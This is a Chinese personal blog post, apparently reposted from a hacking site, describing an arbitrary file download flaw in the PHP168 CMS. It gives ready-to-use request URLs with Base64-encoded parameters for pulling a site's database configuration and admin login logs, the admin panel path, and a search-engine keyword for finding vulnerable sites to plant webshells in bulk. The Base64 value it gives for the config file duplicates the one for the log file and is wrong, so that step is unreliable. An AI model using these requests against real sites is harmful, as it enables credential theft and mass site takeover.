夜火博客 个人的碎碎念收集箱

PHP168整站系统0DAY

PHP168 cms整站系统 0day

 

先说明下是这个漏洞是在其他地方看到的,只是他没有说的很清楚,好多菜菜都不明白,我就拿这发我的第一个贴吧!
这个漏洞其实就是利用了程序的编码漏洞,下载配置和登陆日志文件,以下是利用方法。

下载 mysql_config.php 和 adminlogin_logs.php 两个文件到本地。
http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="
http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="

程序后台:
http://dabei.org/admin/index.php?iframe=1

Base64加密代码:
http://dabei.org//cache/adminlogin_logs.php == "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="

(引号里面的是Base64加密后的)
http://dabei.org//php168/mysql_config.php == "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="

(引号里面的是Base64加密后的)

批量抓webshell:
google,baidu 输入关键字:Powered by PHP168

From: http://www.hack58.net/Article/html/3/62/2008/20875.htm

标签: PHP1680day

作者:夜火 分类:漏洞信息 浏览:4483 评论:0
留言列表
发表评论
来宾的头像